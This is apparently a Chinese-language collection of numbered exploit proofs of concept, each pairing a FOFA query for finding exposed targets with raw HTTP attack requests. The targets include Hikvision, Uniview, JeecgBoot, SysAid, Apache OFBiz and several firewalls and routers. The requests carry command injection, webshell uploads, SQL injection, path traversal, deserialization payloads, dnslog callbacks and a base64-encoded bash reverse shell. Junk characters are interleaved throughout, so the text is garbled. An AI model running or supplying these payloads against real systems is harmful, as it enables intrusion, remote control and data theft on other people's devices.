; r" [2 T @) a$ ] U3 ~3 ]2 r/ y2 g W+ {
3 n9 ]2 o2 k3 R. h" o; C79. BYTEVALUE 百为流控路由器远程命令执行
% y; U% ]( j" X) N! nFOFA:BYTEVALUE 智能流控路由器$ r$ R# P9 v6 _" Y( }$ _+ g4 P
GET /goform/webRead/open/?path=|id HTTP/1.1
/ c# E: G1 u" R0 t& J& @4 E WHost:IP" ^* A. [8 o- H- R) J; E0 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.06 O1 J( a7 K5 n. S+ ^! W+ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 v; M; ~) U( WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 j4 \0 c- c( y" [" {! p* |8 FAccept-Encoding: gzip, deflate' ~5 t2 z+ d1 M8 s% Y8 s
Connection: close
" r! k9 x; ^9 |/ `+ u# SUpgrade-Insecure-Requests: 1, z3 U# y- g) h( n* S! v
% v5 X4 ^% U3 I( ]: a2 p0 k* E5 N) B/ k( U W
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传3 y8 ?9 R) {3 q, ]
FOFA:app="速达软件-公司产品"
% F, r! Y6 W$ J9 L) ?1 LPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1+ [% p8 J7 W$ h
Host: x.x.x.x
% v5 a4 o6 Q$ B+ QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: u: N5 }1 Y, _4 Q7 ?2 W' _Content-Length: 27
, [; u5 z6 @/ @/ f8 c9 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& o: ^8 G3 p: K$ V
Accept-Encoding: gzip, deflate
. [' l' j& f5 P; Q$ Y6 ?3 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# V) c7 Z: d7 q2 OConnection: close
" |3 S/ s8 z+ C+ |# V2 oContent-Type: application/octet-stream9 [4 x& B4 \8 S
Upgrade-Insecure-Requests: 11 S/ E) t' t6 |/ `) g7 ~$ O4 [% x
$ t3 d5 e6 ^ _! X( j
<% out.print("oessqeonylzaf");%>
3 z7 E. n9 M& G& E. G# Y) d" n ] s4 v
9 [, L F: X( O, {; _/ ]9 p7 H+ m
GET /xykqmfxpoas.jsp HTTP/1.1( b, g8 o6 f( v7 Y
Host: x.x.x.x
n, _& Y* ~- F+ G F% T* ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15% m/ }# h8 T6 m# F5 F; B* e. X
Connection: close
+ k* \6 e8 R+ m* e1 T8 w! A, lAccept-Encoding: gzip8 S( G# x5 `( i7 a! v# Y: @; [8 [
# K4 Q+ g" ?) T$ Z! Z3 G( T8 ^1 A" E" `! ]7 [ f* l3 i- c
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露$ r( {$ h+ ]4 t9 O- e7 o
FOFA:app="uniview-视频监控"0 r2 Y' O# P9 J+ Q$ f# p
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1; d; P+ l9 O2 U# D% X/ ]8 h
Host: x.x.x.x* c1 j R6 [; K) @- I. h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 z j# s# q7 H
Connection: close" e' P5 V7 X: T7 ^
Accept-Encoding: gzip
1 J5 Q( K j6 s9 V7 E( Y" p- }0 X0 x2 e; U$ A, u/ g# _ P' |" l
) [3 @' `- o1 q$ P9 g82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行+ F/ {; e+ [* s
FOFA:app="思福迪-LOGBASE"5 d6 S9 A" {/ o% ^1 i+ B" t
POST /bhost/test_qrcode_b HTTP/1.1- n+ v$ |+ @. ^9 e. G! S
Host: BaseURL& D+ L! n* }0 m& ~$ {. {
User-Agent: Go-http-client/1.1- ~( R6 s# k2 C8 O
Content-Length: 23+ E: I; `0 V' Q/ D' N) |
Accept-Encoding: gzip
# U3 _. R8 t7 s+ ]$ f: CConnection: close, ]: {- Y& E3 J4 W
Content-Type: application/x-www-form-urlencoded
. A2 D* h$ g6 J- @" J% `Referer: BaseURL
2 f. U. B1 D/ V2 _, d3 Q, M; O; ]; a2 \/ Q9 M! R/ s
z1=1&z2="|id;"&z3=bhost
" j% c2 N! Y0 w U" ~7 A9 [! M2 E: f
/ |. s' B( P, T0 H" o) w( w' G& O) N3 a+ N& v
83. JeecgBoot testConnection 远程命令执行
( t4 F& \, j, T1 J7 X+ @1 z+ XFOFA:title=="JeecgBoot 企业级低代码平台"8 l! n2 L- O& \$ l# p; N6 C1 z
1 `. {; p3 g, A1 m
8 W" B% |$ `- ]- R
POST /jmreport/testConnection HTTP/1.1
# Z) Z6 R/ Y5 c( ?& s0 THost: x.x.x.x
* j) {! B$ ]: ]8 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 n+ B, H; x$ T7 k4 x
Connection: close
/ g, @; ?& I2 k2 J4 hContent-Length: 8881
0 f2 Q0 B* @6 n6 w2 xAccept-Encoding: gzip$ ^ b5 a: [6 p' I; U# v( F4 ]2 j
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"5 r' k4 O4 j) ?, B6 T- O3 V* ^
Content-Type: application/json
' |1 o. G o: B' ?% @4 q; m
& V1 j4 k& {5 p5 T f3 i) I2 CPAYLOAD& x& ]# }8 o1 z, K2 k f6 x4 a! E+ k
7 Q* Z9 I& j) ~% X1 b, G5 t
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
; m% r, m( M' y* }FOFA:title=="JeecgBoot 企业级低代码平台"
- }& V5 \/ K% b8 K& ?8 l2 t* L- V6 [$ v
" n! J1 V6 T T7 p! k) G
6 M; E* B; {9 t+ F7 S9 n! z/ D: z0 t. k; s* l$ T1 @) K4 }) ~4 W
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
9 L" Z9 L$ X& r" S# ZHost: 192.168.40.130:8080
; A( c9 A! z2 _8 O; E; V, ^2 OUser-Agent: curl/7.88.1: |) Z0 Q( J: |2 q& r9 A& v
Content-Length: 156
' d" C p9 L ~) I! k NAccept: */*% z5 m5 e- a. ^# _/ p; {
Connection: close1 |/ W4 i' |3 N5 p8 h' @4 i" p3 h- D
Content-Type: application/json
0 T( e: h, Z) t9 b8 `0 aAccept-Encoding: gzip/ Q! W& S7 q/ p- y; l" E, z3 }
: F' C4 |7 s0 u' R
{
( ^( N* }; n" |, A/ [/ Q3 s "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
7 i A+ U6 A! e4 Y3 w& ` "type": "0"
?9 p9 ~, e2 u2 q6 c8 e}. v7 F1 e/ e, {1 J6 ~. R
) r# n& |8 |& z4 @2 I# g; M: s5 z5 B% l+ t; R/ W
85. SysAid On-premise< 23.3.36远程代码执行
+ i3 g+ a: e. [5 \CVE-2023-472467 r2 z+ ^8 X* j7 x- ]; U# L
FOFA:body="sysaid-logo-dark-green.png"
( Y# S" J! a$ f0 J: v+ aEXP数据包如下,注入哥斯拉马
W" C. j- Y( M* _& CPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* y% J* ?( F6 K/ x
Host: x.x.x.x* g k$ p/ D! B n0 M0 k; Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 U( N4 M. P; y* Q2 a/ K7 `
Content-Type: application/octet-stream* A8 U/ V) J( I' g
Accept-Encoding: gzip7 J. [# D% w1 C! ~( H% |3 f
; d1 g3 V7 k9 J- o8 t4 k1 UPAYLOAD
7 b# H: G, [; h: I
- G# ~# X9 H+ Z2 T7 @) C回显URL:http://x.x.x.x/userfiles/index.jsp
7 R5 `6 N5 F5 ]% z! i0 O6 V. }- j" F- h, ?! D
86. 日本tosei自助洗衣机RCE
- _9 N" c& A& G2 y2 ^# n2 p. RFOFA:body="tosei_login_check.php"
7 K2 O, V6 Z6 b3 mPOST /cgi-bin/network_test.php HTTP/1.17 K9 o- P% {/ v. k; C) K2 n' J
Host: x.x.x.x
" l [8 o5 R- a/ S6 NUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36& V8 I; O# U; u8 |
Connection: close' g& D4 i( a7 |4 }* T; i9 \* I
Content-Length: 44& T4 {/ |: d! e1 c
Accept: */*
/ u# N3 X* p f! z% e7 Q# ^. X* _4 {Accept-Encoding: gzip
6 ~; E1 `' m5 ^3 n* OAccept-Language: en
* a; ? f$ U/ u6 jContent-Type: application/x-www-form-urlencoded* ?4 J; R9 d& ]) t8 R* u
9 r: _5 d% n9 ~( d' P% D% U
host=%0acat${IFS}/etc/passwd%0a&command=ping
: r- D: m! D( ?% z# |2 }6 r
. J/ [ e$ }5 V8 U( ?* t: o8 h$ z% D- n: u# k
87. 安恒明御安全网关aaa_local_web_preview文件上传& _! }! ^. l! b9 g$ t
FOFA:title="明御安全网关"6 c2 N: A+ v& n4 l
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
% @! r/ }/ K: I; ~8 ?Host: X.X.X.X8 `& w% l$ D4 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. O7 W# [# x @. K( T0 X, B4 s gConnection: close6 X$ \* K7 y8 C/ H a
Content-Length: 198, x6 ^) \5 E, v1 P
Accept-Encoding: gzip
0 q7 e, b- [8 y, w4 X& iContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd7 T' @" T. q1 F2 @4 d: f1 X
3 L) v. z( H, A5 ?; c3 h' I. ?) h--qqobiandqgawlxodfiisporjwravxtvd; ~% N0 O s o3 r
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
2 B: [* I8 H( y1 \Content-Type: text/plain* h, q- D- x- a" w
3 R3 }: K3 W( _5 ~3 p% q7 O
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
( _7 ^' b3 I* S% ]6 ] u4 O+ |$ b--qqobiandqgawlxodfiisporjwravxtvd--
. P5 c. A$ x! t* j8 C, o, t
$ s o8 ?/ t) i' ^; l z3 m# `# x# U/ i) I3 B5 p! x0 S7 @5 c# N7 Q4 A
/jfhatuwe.php
5 G7 s3 D1 u$ C s0 l- N6 |- D Z% z- U- H% a2 J
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行9 Y5 l! ^8 c2 {# E8 w. f! u: Q2 Q, g
FOFA:title="明御安全网关"6 m# ^6 j8 ~: E! z
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1% Z. ]8 @4 ^% F" ]
Host: x.x.x.xx.x.x.x- Y# E- z1 D+ C, {+ z/ s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- F0 k( Q0 ~. \) j: @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 E) T- `9 h6 j0 }. `+ d$ h
Accept-Encoding: gzip, deflate, h; R( z. g5 ^& @" y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 z( ?- G; c* Y d5 mConnection: close6 a# @ |& n' I. z
: \8 b* R, l0 u a7 D# h8 }+ i) S+ Q' u% e; ]
/astdfkhl.php
6 _& |: F; v: P: Q0 W$ F9 u* s6 f: z |4 U. L
89. 致远互联FE协作办公平台editflow_manager存在sql注入
^3 a" r) @; _+ T9 k2 c, ~, U1 L5 PFOFA:title="FE协作办公平台" || body="li_plugins_download"
8 Y g _& S" P' r2 A& e: Q: kPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
4 ^7 h/ p$ |% `+ X' N# }! oHost: x.x.x.x1 L3 J8 X, Z- ?" @, Q. ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- L8 c& I9 \# C2 e3 V
Connection: close4 q& @+ ]' q1 {$ Q
Content-Length: 41
( {8 S; k7 s. [" a" DContent-Type: application/x-www-form-urlencoded8 `7 B% t/ ^- S2 v/ }! t
Accept-Encoding: gzip( o0 i" u5 q, d6 e# O7 E% j
% l' @ h' P7 N! S
option=2&GUID=-1'+union+select+111*222--+
& \ X- e6 v; M
2 \9 E5 ^% @# u2 l3 @3 b8 b/ T* J7 l3 w- g$ T P6 J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行3 Q) q' ^/ p- p3 @
FOFA:icon_hash="-1830859634"
5 [* c8 @ K0 uPOST /php/ping.php HTTP/1.1
, R' [& c. W! o9 P& t* Z+ O* ]Host: x.x.x.x
' s Q5 v( u: `8 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.02 V' s; c. w* V$ H: U
Content-Length: 513 e; {: k! L, W2 A
Accept: application/json, text/javascript, */*; q=0.01
6 d2 @3 j$ z% f1 ^" I: n7 b" yAccept-Encoding: gzip, deflate
- @+ c) F9 Q+ b$ X+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' `0 m. T0 J5 L- gConnection: close
! M5 u( _; M) J. zContent-Type: application/x-www-form-urlencoded
! Q' K4 n6 D# h+ Y* |; ]" }X-Requested-With: XMLHttpRequest
+ X: p4 d! W# a5 X! m" X/ ?1 j. z, t$ \7 o& \0 e$ t' D* d5 L
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
& Z0 J0 l# x! ~2 H4 m
5 C; W. j, h; H7 b( |
: q( q# U7 n/ S# g91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取, H9 Z1 h" K6 j. l6 M _
FOFA:title="综合安防管理平台"- s. j8 V- V" S% U1 a6 X
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
0 v# M$ J9 P' |+ jHost: your-ip
$ F$ M }7 ?' \" eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ f$ ^1 Z5 b+ B5 O( t
Accept-Encoding: gzip, deflate
8 |9 a& }. ~1 i* i2 J8 X6 i( d. HAccept: */*
* y6 N# o* }$ T/ a9 t# C- O7 |Connection: keep-alive3 k. v9 M! G* ~4 c& ?2 ^
0 Y+ `4 h0 O3 ?) [ }1 X% ^: ]: [
9 r; _ x; p' r7 ^- [/ Q6 W92. 海康威视运行管理中心session命令执行4 S% e/ c9 x t: S
Fastjson命令执行+ N5 ?) _8 B6 q
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
+ Q9 a5 ]7 l) Z: _- ^7 y$ _+ iPOST /center/api/session HTTP/1.1
0 g" M. S1 O# \Host:
* p) S% D h1 B& ^% a2 f9 F+ dAccept: application/json, text/plain, */*8 s3 @& @- t, }0 G& e
Accept-Encoding: gzip, deflate
/ x- D9 o: ~# w3 o6 _5 r3 M% NX-Requested-With: XMLHttpRequest9 P8 H+ [9 I' Z% c
Content-Type: application/json;charset=UTF-8
# m9 U3 O* S* ~2 y% VX-Language-Type: zh_CN
1 o& N. V1 P" ]$ [) ]: U; pTestcmd: echo test& X1 L/ d; s! T5 r# C. }) F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 O, p9 j2 ^% a- t6 ~- V h. oAccept-Language: zh-CN,zh;q=0.9
5 |! V# a+ A: p: Y8 mContent-Length: 5778
8 ]4 ^$ K0 U0 x b2 }* R$ ^) G
+ N8 x! i- R7 n6 hPAYLOAD8 @7 J/ h& r7 P
9 {! V/ D4 A1 b O" x5 a
1 B: U3 e- g1 G93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
7 H3 v2 o9 `6 a" P x) iFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
+ U8 {9 m$ A, G. ~2 t- cPOST /?g=app_av_import_save HTTP/1.13 u& w; d# B p4 Y/ T* _
Host: x.x.x.x6 n7 X" Y0 F. u' h( x+ ?* y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
# g: @2 k& c$ S# C H- B& OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- ]( J% x0 J( P1 P1 q a4 {2 R
( ^+ e# X6 w& f------WebKitFormBoundarykcbkgdfx
# k2 t( R6 `) r) [. L- [Content-Disposition: form-data; name="MAX_FILE_SIZE"
& D# E) w7 p d }: z9 h' B5 V4 O3 ^( q) [2 `, l; E' A
10000000% v1 C, R1 B$ Z
------WebKitFormBoundarykcbkgdfx/ G+ C* t% a; S7 O0 _2 q4 b. G! L
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
2 Q' H' r) V4 p- D* m' k0 N OContent-Type: text/plain
! d+ D- y1 C; {9 [3 n. r& T( M& p8 s4 ]
wagletqrkwrddkthtulxsqrphulnknxa! }- K6 v0 S3 ]1 t
------WebKitFormBoundarykcbkgdfx
( v) t( g# _% O {+ a+ WContent-Disposition: form-data; name="submit_post"
, ^4 ~9 Z8 K5 G# n( R% t7 N3 e
) y2 C" f* ]' ]4 Cobj_app_upfile
}! @7 Z. [3 Q* g# i9 E------WebKitFormBoundarykcbkgdfx, l4 K. b7 F1 b2 f0 w# E
Content-Disposition: form-data; name="__hash__"0 A- A0 x. o& T& t; |, @
" A% {% o0 B2 u0b9d6b1ab7479ab69d9f71b05e0e9445
( U, W6 D# y/ ?- l7 S------WebKitFormBoundarykcbkgdfx--
* z. x) Z A& t- H" U# V+ K3 A; L8 D" x g& v d, q
& Q9 z9 S! P Z1 _1 B; M/ C# V# yGET /attachements/xlskxknxa.txt HTTP/1.1
% B2 i% D$ w, {2 Z6 {, XHost: xx.xx.xx.xx
2 h0 @& D9 m" ~' o3 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 i: z3 ~8 @ t1 L& Q1 _& k
+ a/ H/ _9 k" f' A8 g% L
, V& Y" F4 f7 F" C94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
& I' H( C) C: c) C DFOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". G! X: @4 N h/ w
POST /?g=obj_area_import_save HTTP/1.1
s& l5 p) z" p9 y3 j1 FHost: x.x.x.x
1 s3 @, S" i3 c3 o- j5 ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
( I; M, I; w9 O# ]2 y, i, TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ ~" K% F1 h8 o/ I; S, r
: f: W+ @, K" Y# p( n$ M8 Q------WebKitFormBoundarybqvzqvmt
2 r& S0 \8 ]7 SContent-Disposition: form-data; name="MAX_FILE_SIZE"
3 p. i* J" ]! j: \2 x6 ~+ a, Z5 D$ K+ p/ S* ]. |
10000000
& i7 t- W/ k/ c6 X------WebKitFormBoundarybqvzqvmt
3 C: F8 d" U5 ^5 C# LContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"( F6 ~0 d# b& y2 }8 l
Content-Type: text/plain
0 K1 @- E6 Z# K: Q; E9 G% ]! H( I& q, W% F. c* ~) G0 S2 D$ Y3 n# }* ^
pxplitttsrjnyoafavcajwkvhxindhmu
- I# U4 G* @+ F% ^. X% L: ~------WebKitFormBoundarybqvzqvmt
o. A' X7 L7 o9 I! R9 p4 z3 F0 Q3 t yContent-Disposition: form-data; name="submit_post"
' I7 \; s) y# Q& m* W- {
( @; M. _% Z: D! l# H* O, p6 Wobj_app_upfile2 I# ?, k) _7 p x9 [4 w9 A, r
------WebKitFormBoundarybqvzqvmt2 X: {: q; M' L4 i$ w
Content-Disposition: form-data; name="__hash__"
% G1 [ \; k% n& [ S* g! x: D. f- ]& {' u* X$ U1 \
0b9d6b1ab7479ab69d9f71b05e0e9445
& ~* t8 m2 X# k5 H------WebKitFormBoundarybqvzqvmt--; S8 v; w. z4 X8 e
- j) Q# e1 S# H f" T8 _' V# ~, o- V* q# ]9 u# G* `
3 j- j1 [0 @$ O7 H8 a' a
GET /attachements/xlskxknxa.txt HTTP/1.1
" i! N3 [ k; E# C0 Q9 O" y4 wHost: xx.xx.xx.xx
* B* y6 G6 L( ^4 ~" c$ p6 E) @; lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% g8 ~3 l) r: I% |( w
9 P" Y$ j& B9 g: Q" U& }- R% t, e5 B2 ~. s7 c
- A1 f. {# F; z8 Z, }95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" W9 G# \0 U' _& g$ y1 [) T0 Q! cCVE-2023-49070
4 ?- q- Y: U# kFOFA:app="Apache_OFBiz"
2 c6 I4 s+ Z F+ zPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. L6 x' v, B" d. j9 g; L* {1 T
Host: x.x.x.x
' L$ X+ T. A' E- n# lUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, M- K' ?5 P0 J2 D, jConnection: close; j* Y/ b# j6 M
Content-Length: 889+ {" g# |- }6 N3 w% M
Content-Type: application/xml G. L5 Q& l9 Y2 N+ R6 `8 Y
Accept-Encoding: gzip/ U! j" D0 u/ T4 d3 F
% W/ h0 K& \+ k6 ^7 ]
<?xml version="1.0"?>
5 p0 Y* N0 l! j5 M( Z<methodCall>
; H9 U4 k& \7 x& j1 y7 T <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>0 s& ]1 e2 x& B5 e8 O8 G- p
<params>/ ~: Q3 u* K3 P" k3 R* C: V( l
<param>
( h2 N+ L) m4 o) w& t+ t <value>
4 |" s! s, T9 ]% O <struct>
1 X% v# D" r8 [/ s5 X1 k9 d. ?3 ] <member>$ \' t- Y1 j0 ~9 h+ d
<name>test</name>0 b) w; Q+ W5 f# n v. {0 ^ @: i
<value>
7 T5 h6 q3 T6 ?; F- C& g; k8 j# W <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>" I/ T7 \& B2 h7 i/ P4 k3 \
</value>7 i2 Y8 P/ ^( Y x- t
</member>9 H& R5 J, r( `/ | I k# s
</struct>
( R0 H6 g9 Z) ` s6 V! k6 L: e4 X </value>
7 k: Q( u' r- g; K1 i0 o6 k </param>! ]3 N: n# z! h/ X" Y
</params>
7 j. [) J; ]- P5 K$ u6 w</methodCall>
" W5 X/ K( K) z/ P K( ?
1 U! ?7 t! U& N1 q4 o+ i/ O" B9 F ^( m) n$ d, h6 X3 q
用ysoserial生成payload/ q# H9 S1 m( y5 E% _
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"3 x- N0 E: u$ ~+ S
* ^$ k$ a6 S8 E+ N. Q2 C/ r
' }, Y9 S: N5 w' n# ^0 \5 J
将生成的payload替换到上面的POC6 x. M' v h& d( O, a# m: r+ M
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1; {! w. ~! v% v' O
Host: 192.168.40.130:8443
: r" e: e2 T4 X# cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
3 k) B+ T% Z$ Q% h& L. ?" \" HConnection: close5 o: u ?3 n, l& I
Content-Length: 889
. H$ e+ i. I; R. nContent-Type: application/xml& ?$ o) d0 j# x# |
Accept-Encoding: gzip7 R8 f5 H7 A& r! U" G3 W
/ S+ Z2 }! |2 N& h3 K; X# @PAYLOAD
3 i3 W2 |6 i+ ]$ p2 M; T( q/ L4 c5 c/ w
96. Apache OFBiz 18.12.11 groovy 远程代码执行/ r% k, z, x, {; N/ }
FOFA:app="Apache_OFBiz"
+ W& f! C5 ]8 Y4 O, Z7 |" rPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1* g) ~8 ]0 F/ a) E0 F) Q8 M
Host: localhost:84432 l; }4 L/ ^7 ?; ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- }# W9 j* Q* h8 Y" l8 Y+ v5 I
Accept: */*
5 D9 f, R+ N# L! T" CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" x4 z; `/ y% I5 \& s0 V y+ cContent-Type: application/x-www-form-urlencoded
# A! p& t+ v. W+ O) G& oContent-Length: 55
7 Y2 H' b9 {& N, B
! ?0 Y0 T) n1 z5 d7 e+ xgroovyProgram=throw+new+Exception('id'.execute().text);' p& }3 k3 H. Z) h7 i
" F' N% \6 S9 @4 o$ N/ C& ~' J
4 X+ b/ z; b" Q! v% S1 d
反弹shell" H3 S% T( k+ {) _$ }: b2 D' i
在kali上启动一个监听
) O0 t$ `, G0 b- L/ Snc -lvp 7777/ p) f% j* ~ |8 R8 }0 @/ O. k5 J
# Y. e h4 m) }
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
. t) k, e, M' A: A# dHost: 192.168.40.130:8443
6 e! t; n/ v8 \# F% z$ L. yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- l. r, t$ T. I2 m1 n! n; n
Accept: */*
' D: s$ O. J f& C% ^/ I( z2 k7 PAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: r! c0 t# [2 N; E- I* b6 ?* f
Content-Type: application/x-www-form-urlencoded$ s5 ?+ R) t, n! e
Content-Length: 71
7 Q9 N. |/ u" M2 U6 [" n; |1 k# P: F v; C
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();, ~ M. S& o0 P/ _. O' ~
8 H- S5 {, u% s5 x97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
% t5 R* V3 T* W8 sFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"4 o1 |; }% ?# Z8 t9 R
GET /passport/login/ HTTP/1.1
/ |9 U( X* W V3 y* k. bHost: 192.168.40.130:8085
. @6 P+ v7 P! {# X1 r5 F. sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 |+ w' P |1 J S. B R$ v. CAccept-Encoding: gzip% e8 Q* p2 r; G* [7 f
Connection: close
5 C% c9 j9 L- G# r; d' D2 A1 pCookie: rememberMe=PAYLOAD
9 g& \3 M& |6 r9 _, WX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"$ C$ s% Y' A R; L& j
$ b: i! y8 l" o2 A- g3 O* c% r6 m
2 e6 n8 I! i8 a U* F0 e98. SpiderFlow爬虫平台远程命令执行
3 c/ d& V2 ^3 jCVE-2024-01956 ~" k, D/ ?% M* S" q
FOFA:app="SpiderFlow", j- j2 v7 M, [" y( G* B
POST /function/save HTTP/1.1
0 q* d* Z9 T+ v* `. v8 FHost: 192.168.40.130:8088- [* F% _/ a E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
" q0 @) T8 f, n* i. ` ZConnection: close
, m* D: J# L. H' K$ ~Content-Length: 121( ^5 l3 J; G O, S9 k
Accept: */* @6 U0 _2 a9 k8 Q0 O8 M
Accept-Encoding: gzip, deflate {& Z [0 K" Y' O2 ]- }" l6 n9 x7 _
